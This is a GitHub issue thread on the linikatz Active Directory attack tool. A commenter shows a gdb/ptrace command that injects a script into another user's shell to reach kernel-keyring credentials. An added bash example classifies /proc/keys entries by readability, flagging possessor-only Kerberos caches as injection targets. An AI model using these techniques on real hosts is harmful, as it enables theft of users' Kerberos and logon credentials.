CiscoCXSecurity / linikatz

linikatz is a tool to attack AD on UNIX
BSD 3-Clause "New" or "Revised" License
527 stars 79 forks

Flag useable kernel keyrings #19

Open timb-machine opened 3 years ago

timb-machine commented 3 years ago

Need to dig into this to see what we can do from a shell script perspective. We'll continue to track the wider re-engineering under #6.

X-C3LL commented 3 years ago

Hi!

In the original paper a .sh is provided ("Heracles.sh"). This .sh is called from each user session using GDB:

sudo gdb -p <shell_pid> -batch -ex 'call system("./heracles.sh")'

In reality, gdb is just using ptrace under the hood to attach to the process and do the magic. I don't know if there is a way to do it with pure bash... but as an alternative you can build a one-liner in Perl and use the syscall function to call ptrace and add your call to system("/tmp/your-script-that-uses-keyctl") in any process. I guess Python + ctypes would do the job too.

It is not pure bash... but it is the closest thing you can do, I guess.

I just noticed this exists in Perl => https://metacpan.org/pod/Sys::Ptrace (but I am not sure if it is installed by default).
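The two comments above fit together: the first asks what a shell script can do about kernel keyrings, the second explains why gdb/ptrace is needed to get inside a user's process. The reason is key permissions. A key created with add_key (a Kerberos credential cache held in a KEYRING: ccache, for example) is by default readable only by its possessor, and the owning user gets view permission alone, so the payload can only be read from a process whose keyring chain links that key, i.e. from inside the user's own session. The bash functions below are an added example, not linikatz code and not from the original paper: they parse /proc/keys-format lines and flag each key by who can read or search it, with "possessor-only" marking the keys that need exactly the attach-to-the-session trick. The sample lines, serials and descriptions are constructed.

```bash
#!/bin/bash
# Added example, not linikatz code: classify /proc/keys entries by who can
# read or search them. Field layout of /proc/keys (see keyrings(7)):
#   serial  flags  usage  timeout  perms  uid  gid  type  description
# perms is eight hex digits, one byte each for possessor, user, group, other.
# Bits inside a byte: 0x01 view, 0x02 read, 0x04 write, 0x08 search,
# 0x10 link, 0x20 setattr.

# Constructed sample in /proc/keys format (serials and descriptions made up).
# 3f010000 is the default perms of a key created with add_key: possessor all,
# user view only, so only a process that possesses the key can read it.
SAMPLE_KEYS='0f3a1c2b I--Q---     3 perm 3f030000  1001  1001 keyring   _ses: 2
2a4b6c8d I--Q---     1 perm 3f010000  1001  1001 user      krb5cc_1001: 1234
1b2c3d4e I--Q---     1 perm 3f3f0000  1001  1001 keyring   _uid.1001: 1
3c4d5e6f I------     1 perm 1f3f0000     0     0 keyring   .dns_resolver: empty
4d5e6f70 I--Q---     1 perm 3f3f3f3f     0     0 keyring   _ses: 1
5e6f7081 I--Q---     2 perm 3f010000     0     0 logon     cifs:a:192.0.2.10: 32
6f708192 I------     1 perm 01010000     0     0 keyring   .inaccessible: 0'

# Render one permission byte (two hex digits) as a "vrwsla" letter mask.
perm_mask() {
  local n=$((16#$1)) out="" bit
  for bit in 0x01:v 0x02:r 0x04:w 0x08:s 0x10:l 0x20:a; do
    if (( n & ${bit%:*} )); then out+="${bit#*:}"; else out+="-"; fi
  done
  printf '%s' "$out"
}

# True when a permission byte grants read or search: enough to extract a key's
# payload, or to walk a keyring to the keys it links.
can_use() {
  (( $((16#$1)) & 0x0a ))
}

# Classify one /proc/keys line.
# Output: serial type verdict pos=.. usr=.. grp=.. oth=.. description
classify_key_line() {
  local serial flags usage timeout perms uid gid type desc verdict
  read -r serial flags usage timeout perms uid gid type desc <<<"$1"
  [[ $perms =~ ^[0-9a-fA-F]{8}$ && -n $type ]] || return 1
  local pos=${perms:0:2} usr=${perms:2:2} grp=${perms:4:2} oth=${perms:6:2}
  if   can_use "$oth"; then verdict="world"
  elif can_use "$grp"; then verdict="gid:$gid"
  elif can_use "$usr"; then verdict="uid:$uid"
  elif can_use "$pos"; then verdict="possessor-only"   # only from a session that links it
  else                      verdict="unusable"
  fi
  printf '%s %s %s pos=%s usr=%s grp=%s oth=%s %s\n' "$serial" "$type" "$verdict" \
    "$(perm_mask "$pos")" "$(perm_mask "$usr")" "$(perm_mask "$grp")" "$(perm_mask "$oth")" "$desc"
}

# Read /proc/keys-format lines on stdin and print every key somebody can use.
# Usage: flag_usable_keyrings < /proc/keys
flag_usable_keyrings() {
  local line out
  while IFS= read -r line; do
    out=$(classify_key_line "$line") || continue
    case $out in *" unusable "*) ;; *) printf '%s\n' "$out" ;; esac
  done
}

# Run against the constructed sample (stand-alone demo).
flag_sample() {
  printf '%s\n' "$SAMPLE_KEYS" | flag_usable_keyrings
}

flag_sample
```

Run it as `flag_usable_keyrings < /proc/keys` from inside the session you care about: /proc/keys only lists keys the reading process has view permission on, so a root shell with its own fresh session keyring will not even list another user's possessor-only krb5cc key, which is why the thread reaches for gdb/ptrace to run the script inside the user's process. A keyring reported as readable by a uid can be listed by that uid, but reading a key it links still needs read permission on that key, so the per-key verdict is the one that matters for extraction.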